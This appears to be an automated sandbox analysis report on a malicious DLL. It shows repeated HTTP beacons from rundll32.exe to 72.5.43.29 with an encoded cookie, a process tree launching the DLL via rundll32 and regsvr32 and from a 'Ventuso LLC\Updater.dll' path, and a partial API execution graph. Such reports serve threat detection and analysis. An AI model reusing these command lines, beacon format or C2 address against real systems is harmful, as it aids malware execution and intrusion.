Session IDSource IPSource PortDestination IPDestination PortPIDProcess
17192.168.2.44975472.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:09.576457977 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:10.262981892 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:10 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
18192.168.2.44975572.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:13.727726936 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:14.442205906 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:14 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
19192.168.2.44975672.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:18.145819902 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:18.832154989 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:18 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
20192.168.2.44975772.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:23.815515041 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:24.486062050 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:24 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
21192.168.2.44975872.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:31.541568995 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:32.238486052 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:32 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
22192.168.2.44975972.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:35.741480112 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:36.428111076 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:36 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
23192.168.2.44976072.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:40.152585030 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:40.844693899 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:40 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
24192.168.2.44976172.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:46.401648998 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:47.087104082 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:46 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
25192.168.2.44976272.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:52.723887920 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:53.413911104 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:53 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
26192.168.2.44976372.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:56.461824894 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:57.147458076 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:57 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
27192.168.2.44976472.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:32:03.006439924 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:32:03.708177090 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:32:03 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
28192.168.2.44976572.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:32:09.635644913 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:32:10.347987890 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:32:10 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
29192.168.2.44976672.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:32:12.614826918 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:32:13.419794083 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:32:13 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
30192.168.2.44976772.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:32:19.989518881 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:32:20.674880981 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:32:20 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Target ID:0
Start time:23:29:20
Start date:14/08/2024
Path:C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):false
Commandline:loaddll64.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll"
Imagebase:0x7ff6cef90000
File size:165'888 bytes
MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:1
Start time:23:29:20
Start date:14/08/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:2
Start time:23:29:21
Start date:14/08/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Imagebase:0x7ff6ad640000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:3
Start time:23:29:21
Start date:14/08/2024
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:regsvr32.exe /s C:\Users\user\Desktop\akdn2nefd.bin.dll
Imagebase:0x7ff615620000
File size:25'088 bytes
MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:4
Start time:23:29:21
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:5
Start time:23:29:21
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllGetClassObject
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:6
Start time:23:29:24
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServer
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:7
Start time:23:29:27
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServerEx
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:8
Start time:23:29:32
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\rundll32.exe "C:\ProgramData\Ventuso LLC\Updater.dll",Start /u
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Disassembly

Reset < >

    Execution Graph

    Execution Coverage:8.7%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:25.9%
    Total number of Nodes:1496
    Total number of Limit Nodes:65
    execution_graph 8980 7ffe11509c38 8987 7ffe1150aeec 8980->8987 8982 7ffe11509c45 8986 7ffe1150af00 22 API calls 8986->8982 8993 7ffe1150b674 8987->8993 8990 7ffe1150e390 8991 7ffe1150fa20 _invalid_parameter_noinfo 15 API calls 8990->8991 8992 7ffe11509c4e 8991->8992 8992->8982 8992->8986 8994 7ffe1150b693 GetLastError 8993->8994 8995 7ffe11509c41 8993->8995 8996 7ffe1150b3e0 __vcrt_FlsGetValue 6 API calls 8994->8996 8995->8982 8995->8990 8997 7ffe1150b6a6 8996->8997 8998 7ffe1150b711 SetLastError 8997->8998 8999 7ffe1150b6b6 8997->8999 9000 7ffe1150b434 __vcrt_FlsSetValue 6 API calls 8997->9000 8998->8995 8999->8998 9001 7ffe1150b6c6 9000->9001 9001->8998 9002 7ffe1150e558 __vcrt_getptd_noexit 15 API calls 9001->9002 9003 7ffe1150b6d7 9002->9003 9004 7ffe1150b6ed 9003->9004 9006 7ffe1150b434 __vcrt_FlsSetValue 6 API calls 9003->9006 9005 7ffe1150b434 __vcrt_FlsSetValue 6 API calls 9004->9005 9007 7ffe1150b6fe 9004->9007 9005->9007 9006->9004 9008 7ffe1150e400 __free_lconv_num 15 API calls 9007->9008 9008->8998 8485 7ffe115056bc 8494 7ffe115036d0 8485->8494 8488 7ffe11505778 8489 7ffe11501f20 39 API calls 8490 7ffe11505757 8489->8490 8491 7ffe1150576e 8490->8491 8503 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8490->8503 8504 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8491->8504 8505 7ffe11504890 8494->8505 8496 7ffe1150370f 8497 7ffe11503877 8496->8497 8558 7ffe11506950 GetProcessHeap RtlAllocateHeap 8496->8558 8498 7ffe11509540 _handle_error 8 API calls 8497->8498 8500 7ffe1150388c 8498->8500 8500->8488 8500->8489 8502 7ffe11503732 memcpy_s 8559 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8502->8559 8503->8491 8504->8488 8506 7ffe11507d50 10 API calls 8505->8506 8507 7ffe11504905 RegOpenKeyExW 8506->8507 8508 7ffe11504d50 8507->8508 8509 7ffe11504940 8507->8509 8511 7ffe11507e50 2 API calls 8508->8511 8560 7ffe11506950 GetProcessHeap RtlAllocateHeap 8509->8560 8512 7ffe11504d5d 8511->8512 8514 7ffe11509540 _handle_error 8 API calls 8512->8514 8513 7ffe11504d42 RegCloseKey 8513->8508 8515 7ffe11504d72 8514->8515 8515->8496 8516 7ffe1150494a 8516->8513 8517 7ffe11507d50 10 API calls 8516->8517 8518 7ffe11504978 8517->8518 8519 7ffe11507d50 10 API calls 8518->8519 8520 7ffe1150498c 8519->8520 8521 7ffe11507d50 10 API calls 8520->8521 8522 7ffe115049a0 8521->8522 8523 7ffe11507c50 10 API calls 8522->8523 8524 7ffe115049b4 